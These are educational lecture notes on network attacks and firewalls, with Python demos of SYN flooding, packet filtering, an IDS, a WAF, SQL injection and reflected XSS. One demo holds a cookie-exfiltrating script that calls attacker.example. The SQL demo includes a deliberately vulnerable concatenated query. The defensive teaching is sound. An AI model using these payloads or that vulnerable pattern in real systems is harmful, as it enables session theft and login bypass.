
Firewall

References
Computer Networking: A Top-Down Approach, 4th edition, Chapters 1 and 8. Jim Kurose, Keith Ross, Addison-Wesley, July 2007.

Outline
Part 1: Network Attacks
Part 2: Introduction to Firewalls
Part 3: Firewall Products

Part 1 Network Attacks

Network Security (1/2)

Attacks on Internet infrastructure:
Infecting/attacking hosts with malware: spyware, worms
Unauthorized access (data theft, compromised user accounts)
Denial of Service (DoS): deny access to resources (servers, link bandwidth)
Distributed Denial of Service (DDoS)

Network Security (2/2)

The Internet was not originally designed with (much) security in mind.
Original vision: a group of mutually trusting users attached to a transparent network.
Internet protocol designers are playing catch-up.
Security considerations arise in all layers!
Other sources of attacks: system bugs and holes; social engineering.

Malware (1/2)
Spyware
Infection by downloading a web page carrying the spyware. Records keystrokes and web sites visited, and uploads the information to a collection site.

Virus
Infection by receiving an object (e.g., an e-mail attachment) and actively executing it. Self-replicating: propagates itself to other hosts and users.

Worm
Infection by passively receiving an object that gets itself executed (no user action needed). Self-replicating.

Malware (2/2)
Trojan horse
Malicious code hidden inside a program that appears useful.
Slide notes: BirdSpy (made in Taiwan); Restore OS; used for DDoS.

Denial of Service (DoS)

Attackers make resources (e.g., servers, bandwidth) unavailable to legitimate traffic by overwhelming the resource with bogus traffic.
An attack from a single host is comparatively weak (compare DDoS below). Two variants:
Bandwidth overload, e.g., floods of UDP packets
Connection overload, e.g., floods of TCP connection requests
(Figure: attacker sending bogus traffic toward the target.)

Some Types of DoS

Smurf attack: e.g., ping to a broadcast address (destination 210.5.255.255) with a spoofed source, so every host on that network replies to the victim.
Mail bomb
SPAM
Window system attack
SYN flooding
Buffer overflow
Ping of death

Create a TCP Connection

Client                                                     Server
  ---- SYN=1, Seq=2000 ------------------------------------>
  <--- SYN=1, ACK=1, Seq=4000, ACK#=2001, window size -----
  ---- ACK=1, Seq=2001, ACK#=4001, data ------------------->

Step 1: the client host sends a TCP SYN segment to the server; it specifies the client's initial sequence number and carries no data.
Step 2: the server host receives the SYN and replies with a SYNACK segment; the server allocates buffers and specifies its own initial sequence number.
Step 3: the client receives the SYNACK and replies with an ACK segment, which may already contain data.
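The handshake above, and the SYN-flooding goal discussed later in the deck, as an added example (not code from the original slides): a server-side model of the three-way handshake with a bounded backlog of half-open connections. The sequence numbers, addresses and backlog size are constructed values. It shows a normal exchange completing, then an attacker's SYNs filling the backlog so a legitimate client is refused until the half-open entries time out, which is the behaviour a firewall's connection timeout is meant to bound.

```python
"""Server side of the TCP three-way handshake, modelled with a bounded backlog
of half-open (SYN_RECEIVED) connections. Added example; not from the slides.
Sequence numbers, addresses and the backlog size are constructed values."""
from collections import OrderedDict
from dataclasses import dataclass, field

SYN, ACK = "SYN", "ACK"


@dataclass
class Segment:
    src: str            # sender address as "ip:port"
    flags: frozenset    # subset of {SYN, ACK}
    seq: int            # sequence number
    ack: int = 0        # acknowledgement number (valid when ACK is set)


@dataclass
class Listener:
    """A socket in LISTEN state. Half-open entries are kept in arrival order so
    the oldest can be expired first, as a firewall or OS timeout would."""
    isn: int                 # server initial sequence number (constructed)
    backlog: int = 4         # max simultaneous half-open connections
    half_open: OrderedDict = field(default_factory=OrderedDict)  # src -> server seq
    established: set = field(default_factory=set)
    dropped_syns: int = 0    # SYNs refused because the backlog was full

    def receive(self, seg: Segment):
        """Process one segment; return the reply segment, or None."""
        if seg.flags == {SYN}:                      # step 1: connection request
            if len(self.half_open) >= self.backlog:
                self.dropped_syns += 1              # queue full: this client is refused
                return None
            self.half_open[seg.src] = self.isn      # allocate state for the handshake
            # step 2: SYNACK carries our ISN and acknowledges the client's ISN + 1
            return Segment(seg.src, frozenset({SYN, ACK}), self.isn, seg.seq + 1)
        if seg.flags == {ACK} and seg.src in self.half_open:   # step 3
            if seg.ack == self.half_open[seg.src] + 1:
                del self.half_open[seg.src]
                self.established.add(seg.src)
        return None                                 # anything else: not part of a known handshake

    def expire_half_open(self, keep_newest: int = 0):
        """Timeout: discard stale half-open entries, oldest first."""
        while len(self.half_open) > keep_newest:
            self.half_open.popitem(last=False)


def normal_handshake():
    """Client with ISN 2000 connects to a server with ISN 4000."""
    srv = Listener(isn=4000)
    synack = srv.receive(Segment("client:5555", frozenset({SYN}), seq=2000))
    # client ACK: seq = 2001, ack# = 4001 (this segment may already carry data)
    srv.receive(Segment("client:5555", frozenset({ACK}), seq=synack.ack, ack=synack.seq + 1))
    return synack.seq, synack.ack, "client:5555" in srv.established  # (4000, 2001, True)


def syn_flood(n_bogus: int = 10):
    """Attacker sends SYNs from spoofed sources and never completes step 3,
    so the backlog fills with half-open entries and a real client is refused
    until the entries time out."""
    srv = Listener(isn=4000, backlog=4)
    for i in range(n_bogus):
        srv.receive(Segment(f"10.0.0.{i}:40000", frozenset({SYN}), seq=1))
    refused = srv.receive(Segment("client:5555", frozenset({SYN}), seq=2000)) is None
    srv.expire_half_open()                          # timeout frees the backlog
    accepted = srv.receive(Segment("client:5555", frozenset({SYN}), seq=2000)) is not None
    return refused, srv.dropped_syns, accepted      # (True, 7, True)


if __name__ == "__main__":
    print(normal_handshake())
    print(syn_flood())
```

The attacker never sends step 3, which is why the entries stay half-open; with ten bogus SYNs against a backlog of four, six bogus SYNs and the real client's SYN are dropped (seven in total) before the timeout clears the queue.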

Distributed DoS (DDoS)

Attackers make resources (e.g., servers, bandwidth) unavailable to legitimate traffic by overwhelming the resource with bogus traffic sent from many hosts at once.
1. Select the target.
2. Break into hosts around the network (see malware).
3. Send packets toward the target from the compromised hosts.

Packet Sniffing
A network interface in promiscuous mode reads and records all packets passing by.
Works on broadcast media (shared Ethernet, wireless), where every attached host receives every frame.
Wireshark (formerly Ethereal) is a packet sniffer!
A sniffer reads your packets; an attacker positioned on the path can also modify or drop them.
(Figure: C, sniffing, reads the packet src:B dest:A payload exchanged between Alice and Bob.)

IP Spoofing
Send a packet with a false source address.
Defense requires end-point authentication: the source address alone proves nothing about who sent the packet.
(Figure: C sends a packet with src:B dest:A payload to A, impersonating B.)

Masquerade as You (1/2)

Record-and-playback
Sniff sensitive information (e.g., a password) and replay it later.
(Figure: C records the packet src:B dest:A "user: B; password: foo" that B sends to A.)

Masquerade as You (2/2)

From the system's point of view, whoever holds the password is that user.
Man-in-the-middle attack: the attacker sits between the two parties and relays or alters their traffic.
(Figure: later, C sends src:B dest:A "user: B; password: foo" to A and is accepted as B.)

How to Provide Security?
More throughout this course.
Cryptographic techniques: obvious uses and not-so-obvious uses.
Firewalls.

Part 2 Introduction to Firewalls

Firewalls
To isolate an organization's internal network from the Internet, allowing some packets to pass and blocking others.
(Figure: administered network - firewall - public Internet.)

Comparison of Firewall & Router
(Figure only on the original slide: a firewall and a router side by side at the IP layer; both forward IP packets, the firewall additionally inspects and filters them.)

Goals of Firewalls
Prevent denial of service attacks.
  SYN flooding: the attacker establishes many bogus half-open TCP connections, so no resources are left for real connections.
Prevent illegal modification/access of internal data.
  E.g., an attacker replaces the Central Intelligence Agency's homepage with something else.
Allow only authorized access to the inside network (a set of authenticated users/hosts).

Types of Firewalls
Three types of firewalls:
Stateless packet filters
Stateful packet filters
Application gateways

Stateless Packet Filtering

Should an arriving packet be allowed in? Should a departing packet be let out?
(Figure: internal network - router/firewall - Internet.)
The router filters packet by packet; the decision to forward or drop is based on:
Source IP address, destination IP address
TCP/UDP source and destination port numbers
ICMP message type
TCP SYN and ACK bits

Stateless Packet Filtering Policy

Example 1: Block incoming and outgoing datagrams with IP protocol number = 17 (UDP), and those with either source or destination port = 23 (telnet).
Result: all incoming and outgoing UDP flows and all telnet connections are blocked.

Example 2: Block inbound TCP segments with ACK = 0.
Result: prevents external clients from opening TCP connections to internal hosts (the first SYN of a connection has ACK = 0), but allows internal clients to connect to the outside, since the replies they receive carry ACK = 1.

Policy & Firewall Setting

Policy: No outside Web access.
Setting: Drop all outgoing packets to any IP address, port 80.

Policy: No incoming TCP connections, except those for the institution's public Web server only.
Setting: Drop all incoming TCP SYN packets to any IP except 130.207.244.203, port 80.

Policy: Prevent Web radios from eating up the available bandwidth.
Setting: Drop all incoming UDP packets except DNS and router broadcasts.

Policy: Prevent your network from being used for a smurf DoS attack.
Setting: Drop all ICMP packets going to a broadcast address (e.g., 130.207.255.255).

Policy: Prevent your network from being tracerouted.
Setting: Drop all outgoing ICMP TTL-expired traffic.

Access Control Lists

Table of rules, applied to all packets (internal network 222.22/16), first match wins:

action  source address        dest address          protocol  source port  dest port  flag bit
allow   222.22/16             outside of 222.22/16  TCP       > 1023       80         any
allow   outside of 222.22/16  222.22/16             TCP       80           > 1023     ACK
allow   222.22/16             outside of 222.22/16  UDP       > 1023       53         ---
allow   outside of 222.22/16  222.22/16             UDP       53           > 1023     ---
deny    all                   all                   all       all          all        all

Question of Stateless Packet Filtering

Heavy-handed tool: it admits packets that make no sense, e.g., an inbound segment with source port 80, destination port > 1023 and the ACK bit set, even though no TCP connection has been established.

Rule that admits it:
action  source address        dest address  protocol  source port  dest port  flag bit
allow   outside of 222.22/16  222.22/16     TCP       80           > 1023     ACK

Packet: Source IP 150.23.23.155, Destination IP 222.22.0.2, Source port 80, Destination port 12543, ACK set

Stateful Packet Filtering

Track the status of every TCP connection.
Track connection setup (SYN) and teardown (FIN): the firewall can then determine whether an incoming or outgoing packet makes sense.
Timeout inactive connections at the firewall: their packets are no longer admitted.
The ACL is augmented to indicate when the connection state table must be checked before admitting a packet.
The packet above (Source IP 150.23.23.155, Destination IP 222.22.0.2, Source port 80, Destination port 12543) is now dropped: no connection from 222.22.0.2:12543 to 150.23.23.155:80 exists in the table.

Cisco Router Example

Topology (from the slide figure): host 211.21.160.12 - R1 (e0 on network 168.95.35.0/24; s0) - R2 (s1; e0 on network 10.5.3.0/24)

    R2(config)#access-list 21 deny host 211.21.160.12
    R2(config)#access-list 21 permit any
    R2(config)#interface serial 1
    R2(config-if)#ip access-group 21 in

Notes:
access-list 21 is a standard IP ACL (numbers 1-99): it matches on the source address only.
"host 211.21.160.12" is shorthand for 211.21.160.12 with wildcard mask 0.0.0.0; "any" is shorthand for 0.0.0.0 255.255.255.255. A wildcard mask is not a subnet mask: 1 bits mean "don't care".
Every ACL ends with an implicit "deny ip any any", so "permit any" is required to let the remaining traffic through.
"ip access-group 21 in" applies the list to packets arriving on serial 1.

ACL for Stateful Packet Filtering

action  source address        dest address          proto  source port  dest port  flag bit  check connection
allow   222.22/16             outside of 222.22/16  TCP    > 1023       80         any
allow   outside of 222.22/16  222.22/16             TCP    80           > 1023     ACK       x
allow   222.22/16             outside of 222.22/16  UDP    > 1023       53         ---
allow   outside of 222.22/16  222.22/16             UDP    53           > 1023     ---       x
deny    all                   all                   all    all          all        all
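The two ACL tables (the stateless one under "Access Control Lists" and the stateful one above), as an added example that is not code from the original slides: a small packet filter that evaluates the same five rows, first on headers alone and then with a connection table consulted for the rows marked "check connection". The packets, including the slides' 150.23.23.155:80 -> 222.22.0.2:12543 example, are constructed. It shows the stateless filter admitting that packet and the stateful filter refusing it until an inside host has actually opened the connection, and refusing it again after teardown.

```python
"""Packet filter evaluating the slides' ACL for the 222.22/16 network, first
statelessly and then with a connection table. Added example, not from the
slides; the packets below are constructed."""
import ipaddress
from dataclasses import dataclass

INSIDE = ipaddress.ip_network("222.22.0.0/16")


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    proto: str          # "TCP" or "UDP"
    sport: int
    dport: int
    ack: bool = False   # TCP ACK bit
    syn: bool = False   # TCP SYN bit (not consulted by the slides' rules)


def inside(ip):  return ipaddress.ip_address(ip) in INSIDE
def outside(ip): return not inside(ip)
def high(p):     return p > 1023
def port(n):     return lambda p: p == n


# Rows of the slides' ACL, in order. Fields: action, source test, dest test,
# protocol, source-port test, dest-port test, ACK bit required, check connection table.
RULES = [
    ("allow", inside,  outside, "TCP", high,     port(80), False, False),
    ("allow", outside, inside,  "TCP", port(80), high,     True,  True),
    ("allow", inside,  outside, "UDP", high,     port(53), False, False),
    ("allow", outside, inside,  "UDP", port(53), high,     False, True),
]
# The final "deny all" row is the fallthrough in the functions below.


def matches(pkt, rule):
    _, s, d, proto, sp, dp, need_ack, _ = rule
    return (s(pkt.src) and d(pkt.dst) and pkt.proto == proto
            and sp(pkt.sport) and dp(pkt.dport) and (pkt.ack or not need_ack))


def stateless_filter(pkt):
    """Header-only decision: first matching row wins."""
    for rule in RULES:
        if matches(pkt, rule):
            return rule[0]
    return "deny"


class StatefulFilter:
    """Same rows, but rows marked 'check connection' are honoured only if the
    reverse direction of the flow was seen leaving the inside network."""

    def __init__(self):
        self.table = set()   # (inside ip, inside port, outside ip, outside port, proto)

    def filter(self, pkt):
        for rule in RULES:
            if not matches(pkt, rule):
                continue
            if rule[7]:      # inbound row: must correspond to a recorded outbound flow
                key = (pkt.dst, pkt.dport, pkt.src, pkt.sport, pkt.proto)
                return "allow" if key in self.table else "deny"
            # outbound row: remember the flow so replies can come back
            self.table.add((pkt.src, pkt.sport, pkt.dst, pkt.dport, pkt.proto))
            return "allow"
        return "deny"

    def teardown(self, pkt):
        """FIN or timeout handling: forget the flow; later replies are denied again."""
        self.table.discard((pkt.src, pkt.sport, pkt.dst, pkt.dport, pkt.proto))


# Constructed packets. BOGUS is the slides' "makes no sense" packet: it looks
# like a web server's reply, but no inside host ever opened the connection.
BOGUS = Packet("150.23.23.155", "222.22.0.2", "TCP", 80, 12543, ack=True)
OUTBOUND = Packet("222.22.0.2", "150.23.23.155", "TCP", 12543, 80, syn=True)
REPLY = Packet("150.23.23.155", "222.22.0.2", "TCP", 80, 12543, ack=True, syn=True)


def demo():
    sf = StatefulFilter()
    stateless_verdict = stateless_filter(BOGUS)  # "allow": header fields match row 2
    stateful_verdict = sf.filter(BOGUS)          # "deny": nothing in the connection table
    sf.filter(OUTBOUND)                          # inside client opens the connection
    reply_verdict = sf.filter(REPLY)             # "allow": matches the recorded flow
    sf.teardown(OUTBOUND)
    after_close = sf.filter(REPLY)               # "deny" again once the flow is gone
    return stateless_verdict, stateful_verdict, reply_verdict, after_close


if __name__ == "__main__":
    print(demo())
```

The connection table is keyed on the 5-tuple in the inside-to-outside direction, so an inbound packet is looked up with its addresses and ports swapped; that swap is the whole difference between the two filters.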

Application Gateways
Filter packets on application data as well as on IP/TCP/UDP header fields.
(Figure: host-to-gateway telnet session; application gateway; gateway-to-remote-host telnet session; router and filter.)

Application Gateways Example

Allow selected internal users to telnet outside.
1. Require all telnet users to telnet through the gateway.
2. For authorized users, the gateway sets up a telnet connection to the destination host and relays data between the two connections.
3. The router filter blocks all telnet connections not originating from the gateway.

Comparison
Stateless/stateful filters
Operate on TCP/IP headers only; no correlation check among sessions.

Application gateways
Inspect the application data.

Intrusion detection system (IDS)
Detect and alert if something is wrong.

Intrusion prevention system (IPS)
Detect, alert and filter out.

Intrusion Detection Systems (IDS)

Deep packet inspection: look at packet contents.
E.g., check character strings in the packet against a database of known virus and attack strings.

Examine correlation among multiple packets, to detect:
Port scanning
Network mapping
DoS attacks
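Both IDS techniques above, as an added example that is not code from the original slides: a toy IDS that runs deep packet inspection (signature strings looked up in packet contents) and cross-packet correlation (a source that touches many distinct ports within a time window is flagged as a port scan). The signature list, the threshold and window, and the packet trace are constructed; a real sensor would use far larger signature sets and tuned thresholds.

```python
"""Toy network IDS: deep packet inspection against a signature list, plus
correlation across packets to spot a port scan. Added example, not from the
slides; signatures, thresholds and the packet trace are constructed."""
from collections import defaultdict

# Byte patterns looked for in packet contents (compared case-insensitively).
SIGNATURES = {
    "sql-injection-comment": b"' --",
    "xss-script-tag": b"<script",
    "directory-traversal": b"../../",
}
SCAN_PORT_THRESHOLD = 5    # distinct destination ports from one source ...
SCAN_WINDOW = 10.0         # ... within this many seconds => port scan


def inspect_payload(payload: bytes):
    """Deep packet inspection: names of the signatures present in the payload."""
    low = payload.lower()
    return [name for name, pat in SIGNATURES.items() if pat.lower() in low]


class PortScanDetector:
    """Cross-packet correlation: per source, remember (time, dest port) events
    inside a sliding window and alert once enough distinct ports are hit."""

    def __init__(self, threshold=SCAN_PORT_THRESHOLD, window=SCAN_WINDOW):
        self.threshold, self.window = threshold, window
        self.events = defaultdict(list)    # src -> [(timestamp, dport), ...]
        self.reported = set()              # sources already alerted on

    def observe(self, ts, src, dport):
        """Return the number of distinct ports if src crosses the threshold now, else 0."""
        recent = [(t, p) for t, p in self.events[src] if ts - t <= self.window]
        recent.append((ts, dport))
        self.events[src] = recent
        ports = {p for _, p in recent}
        if len(ports) >= self.threshold and src not in self.reported:
            self.reported.add(src)
            return len(ports)
        return 0


def run_ids(packets):
    """packets: iterable of (timestamp, src, dst, dport, payload). Returns the alerts."""
    alerts = []
    scanner = PortScanDetector()
    for ts, src, dst, dport, payload in packets:
        for sig in inspect_payload(payload):
            alerts.append(("signature", sig, src))
        n = scanner.observe(ts, src, dport)
        if n:
            alerts.append(("portscan", src, n))
    return alerts


# Constructed trace: one client probing a web app, one host sweeping ports, one benign request.
TRACE = [
    (0.0, "10.9.8.7", "222.22.0.2", 80, b"GET /login?ID=Admin' -- HTTP/1.1"),
    (0.5, "10.9.8.7", "222.22.0.2", 80, b"GET /search?q=<SCRIPT>alert(1)</SCRIPT> HTTP/1.1"),
    (1.0, "10.1.1.1", "222.22.0.2", 21, b""),
    (1.1, "10.1.1.1", "222.22.0.2", 22, b""),
    (1.2, "10.1.1.1", "222.22.0.2", 23, b""),
    (1.3, "10.1.1.1", "222.22.0.2", 25, b""),
    (1.4, "10.1.1.1", "222.22.0.2", 80, b""),
    (30.0, "10.2.2.2", "222.22.0.2", 443, b"GET / HTTP/1.1"),
]

if __name__ == "__main__":
    for alert in run_ids(TRACE):
        print(alert)
```

The port-scan detector only ever sees headers, which is why it needs state across packets; the signature matcher needs no state but sees nothing an attacker encodes differently, which is the gap the positive-model WAF discussed in Part 3 is meant to cover.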

Multiple IDSs
Different types of checking at different locations.
(Figure: Internet - application gateway / firewall - internal network; IDS sensors are placed in the demilitarized zone, which hosts the Web server, FTP server and DNS server, and inside the internal network.)

Limitations of Firewalls (1/2)

IP spoofing: the router can't know whether the data really comes from the claimed source.
If multiple applications need special treatment, each needs its own application gateway.
Client software must know how to contact the gateway, e.g., the proxy's IP address must be set in the Web browser.

Limitations of Firewalls (2/2)

Filters often use an all-or-nothing policy for UDP.
Tradeoff: degree of communication with the outside world vs. level of security.
Many highly protected sites still suffer from attacks.

Part 3 Firewall Products


Products
General firewall
IDS, IPS
Mail firewall
Web Application Firewall (WAF)

Mail Firewall
Anti-virus
Anti-spam

Web Site Attack
(Figure: attack flow against a web site, numbered 1 to 5; labels A1 (JavaScript, i.e., cross-site scripting) and A2 (SQL injection) mark where each attack class reaches the Web application.)

Normal Connection

A legitimate login request: ID=A123456789, Passwd=1234

SQL Injection Attack

ID=Admin' --
Passwd=1234
The quote closes the string literal and "--" comments out the rest of the WHERE clause, so the password check is never evaluated and the attacker logs in as Admin.
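The login above, as an added example (not code from the original slides) against an in-memory SQLite database: the vulnerable query built by string concatenation beside the parameterized one. The users table, the credentials and the plaintext password column are constructed for the demonstration (a real system stores password hashes). It shows the "Admin' --" ID logging in without the password through the first query and being treated as a literal, non-matching ID by the second.

```python
"""Login check against SQLite: the vulnerable string-built query beside the
parameterized one. Added example, not the slides' code; the users table and
credentials are constructed (passwords are stored in clear only for brevity)."""
import sqlite3


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id TEXT PRIMARY KEY, passwd TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("Admin", "s3cret"), ("A123456789", "1234")])
    return db


def login_vulnerable(db, user_id, passwd):
    """Untrusted input pasted straight into SQL. With user_id = "Admin' --"
    the statement becomes
        SELECT id FROM users WHERE id='Admin' --' AND passwd='1234'
    and everything after -- is a comment, so the password is never checked."""
    sql = f"SELECT id FROM users WHERE id='{user_id}' AND passwd='{passwd}'"
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(db, user_id, passwd):
    """Bound parameters: the driver sends the values separately from the
    statement text, so the input can only ever be data, never SQL syntax."""
    row = db.execute("SELECT id FROM users WHERE id=? AND passwd=?",
                     (user_id, passwd)).fetchone()
    return row[0] if row else None


def demo():
    db = make_db()
    return (
        login_vulnerable(db, "A123456789", "1234"),  # normal login -> "A123456789"
        login_vulnerable(db, "Admin' --", "1234"),   # injection -> "Admin", no password needed
        login_safe(db, "Admin' --", "1234"),         # parameterized -> None (no such id)
        login_safe(db, "Admin", "s3cret"),           # real credentials -> "Admin"
    )


if __name__ == "__main__":
    print(demo())
```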

Cross-Site Scripting (XSS)

The server does not validate the page parameters.
The server does not validate uploaded data (e.g., user content on YouTube).
The web page is delivered with a malicious script attached, e.g., JavaScript or VBScript, which the victim's browser runs with the site's privileges.
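The unvalidated page parameter described above, as an added example that is not code from the original slides: a page handler that reflects a query parameter into HTML unchanged, beside one that HTML-escapes it. The host name, the parameter name and the cookie-stealing payload (of the kind shown in "XSS Case 1" below) are constructed. It shows the same request producing a page that carries a script element in one case and inert text in the other.

```python
"""Reflected XSS: a page that echoes a query parameter verbatim beside one
that HTML-escapes it. Added example, not from the slides; the host name,
parameter and cookie-stealing payload are constructed."""
import html
from urllib.parse import parse_qs, quote, urlsplit

# Constructed payload: ship the victim's cookies to the attacker's host.
# (Marking session cookies HttpOnly keeps them out of document.cookie, but
# does not stop the script from acting on the victim's behalf.)
PAYLOAD = "<script>document.location='http://attacker.example/c?'+document.cookie</script>"


def _param(url, name):
    """Value of query parameter `name`, as the server would decode it."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def render_vulnerable(url):
    """Parameter inserted into the HTML unchanged: the browser runs it as script."""
    return f"<p>Hello {_param(url, 'name')}</p>"


def render_safe(url):
    """Output encoding for the HTML body context: <, >, &, ' and " become
    entities, so the payload is displayed as text instead of executed."""
    return f"<p>Hello {html.escape(_param(url, 'name'), quote=True)}</p>"


def contains_script(page):
    """Crude stand-in for the browser's parser: would a <script> element appear?"""
    return "<script" in page.lower()


def demo():
    url = "https://bank.example/greet?name=" + quote(PAYLOAD)
    return contains_script(render_vulnerable(url)), contains_script(render_safe(url))  # (True, False)


if __name__ == "__main__":
    print(render_safe("https://bank.example/greet?name=" + quote(PAYLOAD)))
```

Escaping is context-specific: html.escape is right for text between tags, but a value placed inside a JavaScript string or a URL attribute needs that context's encoding instead.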

XSS Case 1:
(Figure: the injected script reads the victim's cookies and sends them to the hacker's computer.)

XSS Case 2:
(Figure: the injected script runs inside the trusted site's domain and makes the victim's browser contact the hacker's server.)

Web Application Firewall (1/2)

A reverse proxy that acts as an intermediary between the client browser and the Web server, inspecting HTTP requests and responses before forwarding them.

Web Application Firewall (2/2)

Provides positive/negative dual-mode inspection: negative rules block requests matching known-bad patterns (signatures); positive rules allow only requests that fit a model of the parameters and value formats the application expects, so unknown attacks are rejected too.
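The dual-mode inspection above, as an added example that is not any product's code: a request check that applies a negative model (three attack signatures) and a positive model (the parameters and formats a /login page may receive). The rule set, the site name and the four requests are constructed. It shows the slides' "Admin' --" request caught by both modes, an obfuscated injection the signatures miss but the positive model rejects, and an unexpected extra parameter rejected by the positive model alone.

```python
"""WAF request check in dual mode: negative (known-bad patterns) and positive
(allowlist of the parameters and value formats each page expects). Added
example, not any product's code; the rules, paths and requests are constructed."""
import re
from urllib.parse import parse_qs, urlencode, urlsplit

# Negative model: signatures of attacks we already know.
NEGATIVE_RULES = {
    "sqli-comment":   re.compile(r"'\s*--"),
    "sqli-tautology": re.compile(r"'\s*or\s+'?\d*'?\s*=\s*'?\d*", re.I),
    "xss-tag":        re.compile(r"<\s*script", re.I),
}

# Positive model: for each path, exactly which parameters may appear and what
# they may look like. Anything outside the model is rejected, known attack or not.
POSITIVE_MODEL = {
    "/login": {
        "ID":     re.compile(r"^[A-Za-z0-9]{1,20}$"),
        "Passwd": re.compile(r"^.{1,64}$"),
    },
}


def inspect(url):
    """Return ("allow" | "block", findings) for one GET request URL."""
    parts = urlsplit(url)
    params = parse_qs(parts.query, keep_blank_values=True)
    findings = []

    # Negative mode: scan every parameter value against the signature list.
    for name, values in params.items():
        for value in values:
            for rule, pattern in NEGATIVE_RULES.items():
                if pattern.search(value):
                    findings.append(("negative", rule, name))

    # Positive mode: the request must fit the model for its path.
    model = POSITIVE_MODEL.get(parts.path)
    if model is None:
        findings.append(("positive", "unknown-path", parts.path))
    else:
        for name, values in params.items():
            if name not in model:
                findings.append(("positive", "unknown-parameter", name))
            elif not all(model[name].match(value) for value in values):
                findings.append(("positive", "bad-format", name))

    return ("block" if findings else "allow"), findings


BASE = "https://www.example/login?"   # constructed origin


def demo():
    """Verdicts for a normal login, the slides' injection, an obfuscated
    injection the signatures miss, and a request with an unexpected parameter."""
    normal  = inspect(BASE + urlencode({"ID": "A123456789", "Passwd": "1234"}))
    classic = inspect(BASE + urlencode({"ID": "Admin' --", "Passwd": "1234"}))
    evasive = inspect(BASE + urlencode({"ID": "Admin'/**/OR/**/1=1/**/--", "Passwd": "1234"}))
    extra   = inspect(BASE + urlencode({"ID": "A123456789", "Passwd": "1234", "debug": "1"}))
    return normal[0], classic[0], evasive[0], extra[0]   # ("allow", "block", "block", "block")


if __name__ == "__main__":
    for req in ("Admin' --", "Admin'/**/OR/**/1=1/**/--"):
        print(inspect(BASE + urlencode({"ID": req, "Passwd": "1234"})))
```

The positive model is what makes the evasive request fail: the ID never fits ^[A-Za-z0-9]{1,20}$ no matter how the SQL is disguised. The cost is that the model must be kept in step with the application, which is why products combine both modes rather than relying on either one.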

Summary
Firewall; firewall log
IDS; IPS
MIS